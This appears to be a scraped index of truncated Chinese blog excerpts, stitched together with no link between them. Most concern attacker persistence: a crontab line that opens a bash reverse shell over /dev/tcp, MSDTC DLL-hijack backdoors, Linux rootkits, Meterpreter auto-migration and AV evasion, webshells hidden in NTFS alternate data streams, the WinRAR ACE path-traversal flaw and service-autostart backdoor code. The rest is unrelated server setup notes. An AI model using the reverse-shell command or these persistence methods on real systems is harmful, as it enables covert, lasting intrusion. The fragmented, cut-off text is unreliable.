正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - 升级猥琐版本 (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&am

最近用的多  一个实用小tips 文章参考原创Shadow Force大牛  翻译文章参考三好大佬 利用MSDTC服务加载后门dll,实现自启动后门 后门思路可以查看趋势科技文章 https://blog.trendmicro.com/trendlabs-security-intelligence/shadow-force-uses-dll-hijacking-targets-south-korean-company/ 0x01 MSDTC简介 msdtc.exe是微软分布式传输协调程序.该进程

转载自 https://evilanne.github.io/2017/08/26/Linux%E5%90%8E%E9%97%A8-%E6%8C%81%E7%BB%AD%E5%85%B3%E6%B3%A8/ 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux后门,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一至在关注这方面,有的话会继续更新 常用后门技术 增加超级用户帐号 破解/嗅控用户密码 放置S

目录 . Rootkit相关知识 . BROOTKIT源码分析 . 关键技术点 . 防御策略 1. Rootkit相关知识 关于rootkit的相关其他知识,请参阅以下文章 http://www.cnblogs.com/LittleHann/p/3918030.html http://www.cnblogs.com/LittleHann/p/3910696.html http://www.cnblogs.com/LittleHann/p/3879961.html http://www.cnblo

catalog . Windows注册表 . Windows注册表包含的攻击向量 . 注册表安全配置基线标定 1. Windows注册表 注册表(Registry,繁体中文版Windows称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息.早在Windows 3.0推出OLE技术的时候,注册表就已经出现.随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统.但是,从Microsoft Windows 95开始,注册表才真正

1. Windows注册表简介 注册表(Registry,繁体中文版Windows称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息.早在Windows 3.0推出OLE技术的时候,注册表就已经出现.随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统.但是,从Microsoft Windows 95开始,注册表才真正成为Windows用户经常接触的内容,并在其后的操作系统中继续沿用至今 0x1: 注册表的由来 在Wind

监听 AutoRunScrip:自动执行脚本 如:自动执行post/windows/manage/migrate set AutoRunScript post/windows/manage/migrate set autorunscript migrate -f #获取shell后,将自动迁移到另一个进程 自动注入进程 set prependmigrate true set prependmigrateProc svchost.exe 免杀 将控制端向被控制端发送的stage进行编码,从而绕过s

转自:http://blog.csdn.net/supermapsupport/article/details/70254484 产品白皮书 iServer产品  教学视频  许可说明  安装部署  数据对接  缓存配置  扩展开发  性能提升  其他 iPortal产品  功能简介  首页定制  部门配置  权限设置  资源审核  服务托管  在线制图  其他 iExpress产品 iCloudManager产品  功能简介  安装手册 Online产品 iClient产品  教学视频  地图

场景:要用一台服务器(Windows Server 2012),加装了一张双口的千兆网卡,安装一个虚拟机,使用爱快在虚拟机里当做软路由. - 那么问题来了,我这台是只能远程的,如果软路由没启动,怎么办?我只有拿主机下来连上显示器鼠标键盘,重新设置. - 本文重点不在爱快软路由的安装~因为我折腾了上午一半时间. - 废话不说了,直接记录. 参考:(Windows 2008 R2设置Vmware在开机登录之前自启动)[http://blog.csdn.net/ituff/article/detail

#cd /opt#tar -zxvf redis-4.0.6.tar.gz#cd redis-4.0.6#make #cd src#make install PREFIX=/usr/local/redis#mkdir –p /usr/local/redis/etc放配置文件#mv /opt/redis-4.0.6/redis.conf /usr/local/redis/etc/修改配置文件:默认情况,Redis不是在后台运行,我们需要把redis放在后台运行vi /usr/local/redis

现在的服务器性能往往过剩,利用虚拟机可以提高服务器的利用效率.VMware是一款很好的虚拟机软件,但是其WorkSation版本并不支持开机自动启动,支持开机自启的Server又长年没有更新,已经无法支持2008R2了,今天的教程将帮助大家解决这个问题. 1.需要的工具instsrv.exe和srvany.exe. 下载地址:http://www.microsoft.com/en-us/download/confirmation.aspx?id=17657 下载回来的是Windows Serve

初步需求:将在Windows/MyEclipse中开发的java应用程序部署到Linux服务器上,使其运行 针对需求,可以参考下面这些文章,但是这些文章很多东西没有提及到,我自己尝试部署运行 在linux下利用nohup来后台运行java程序    http://blog.csdn.net/lzzyok/article/details/7177293 在linux下利用脚本启动java程序    http://blog.csdn.net/hbcui1984/article/details/167

1,下载teamviem客户端的Ubuntu版本 下载地址 https://www.teamviewer.com/en/download/linux/ 2,安装 apt install ./teamviewer_14.2.8352_amd64.deb 如果安装报错可以使用命令安装 apt install --fix-broken ./teamviewer_14.2.8352_amd64.deb 3,启动 需要在桌面环境启动 设置固定密码 使用teamview客户端远程连接即可 设置开机自启动 h

漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为<Extracting a 19 Year old code Execution from WinRAR>的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行. 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触

愉快的lnmp环境搭建 后续更新 几个笔记记录 yum remove php-mysql yum -y install cmake autoconf wget gcc-c++ gcc zlib pcre pcre-devel zipyum -y install bison bison-devel perl vim libjpeg libjpeg-devel libpng libpng-devel yum -y install freetype freetype-devel libxml2 lib

权限维持是一门庞大的学问,当攻击者在入侵服务器获得主机权限后,往往会想尽办法隐藏其入侵途径以维持权限.权限维持的一般手段包括构造文件包含漏洞.构造远程任意代码执行漏洞.构造SQL注入点.利用系统自启动后门和隐藏 Webshell等.本文介绍如何利用ADS数据流隐藏Webshell,以及如何利用iGuard防御ADS. 一.NTFS文件系统 & ADS特性 1. NTFS/ADS 是什么? NTFS(New Technology File System) 是微软公司开发的文件系统.自Windows

简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现. C++代码样例 ////////////////////////////////////////////////////////////// // // FileName : ServiceAutoRunDemo.cpp // Creator : PeterZ1997 //

开机自启动脚本 网上常见的脚本开机自启方法是: 假设要自启的脚本位于 /home/user/test.sh 给脚本可执行的权限 sudo chmod +x /home/user/test.sh 将脚本文件放到 /etc/init.d/ 目录下 sudo cp /home/user/test.sh /etc/init.d 链接到/etc/rc.d/ sudo ln -s /etc/init.d/start_my_app /etc/rc.d/ 这样在新的diban系统中可能不能生效,要LSB 兼容之

cd /mnt/tools/trunk/plugins/personas; python update_keywords.py crontab 问题分析  crontab 问题分析 - CSDN博客 https://blog.csdn.net/tengdazhang770960436/article/details/50997297

简介 在Windows系统中有一个系统服务控制器,叫做SVCHost.exe,它可以用来管理系统的多组服务.它与普通的服务控制不同的是它采用dll导出的ServiceMain主函数实现服务运行,详细原理可参照Blog:SVCHOST启动服务实战.我们在使用此方法时,要有两个步骤: 编写dll文件封装ServiceMain导出函数 编写负责服务安装与移除的exe文件 本例中需要将.exe与.dll文件放置在同一个文件夹下运行,.exe文件会将dll复制进系统目录. C++代码样例 DLL程序代码: